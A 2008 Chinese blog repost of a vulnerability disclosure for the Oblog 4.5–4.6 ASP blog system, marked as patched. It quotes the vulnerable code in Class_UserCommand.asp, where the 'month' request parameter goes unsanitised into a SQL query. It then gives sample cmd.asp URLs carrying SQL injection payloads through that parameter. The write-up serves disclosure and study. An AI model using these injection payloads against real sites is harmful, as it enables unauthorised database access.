Oblog最新注入漏洞分析(已修补)

2008-6-30 16:43:51  分类:技术文章  作者:xloong 已被围观loading 被网友评论2条 我要评论

Date:2008-5-15
Author:Yamato[ BCT ]
Version:Oblog 4.5-4.6 sql

代码分析:

文件In/Class_UserCommand.asp :

strMonth=Request("month") //第63行

strDay=Request("day")

……

Case "month" //第84行

Dim LastDay

G_P_FileName = G_P_FileName & "month&month=" & strMonth

strDay=Left(strMonth,4) & "-" & Right(strMonth,2) & "-01"

mYear=Left(strMonth,4)

mMonth=Right(strMonth,2)

If InStr ("01,03,05,07,08,10,12",mMonth)> 0 Then

LastDay = "31"……

Else //第109行

SqlPart = " And Addtime >='"&strMonth&"01' AND Addtime < '"&strMonth&LastDay&"' "

构造合适的变量strMonth进行注射

测试方法:

http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01

strDay变量从month中获得日期数据,并判断strDay是否为日期数据。所以构造的注射语句为:

http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01

执行sql语句采用rst.Open strSql,Conn,1,1

不能修改记录集.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
如原创文章转载,请注明: 转自:夜火博客 [ http://www.15897.com/ ]

本文链接地址: http://www.15897.com/blog/post/Oblog-SQL-injection-loophole-latest-Fixes.html

Tags: Oblog   注入   漏洞信息   技术类  

| More

已有2位网友对本文做了一针见血的评论 【我要评论

  1. My Gravatar Icon wanfuwu 说:

    Oblog是asp博客吗?

  2. My Gravatar Icon xloong 说:

    是asp的

评论:



< # TEMPLATE_INCLUDE_POSTAD # >
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

订阅RSS

搜 索

最新发表

最新评论

最新留言

其 他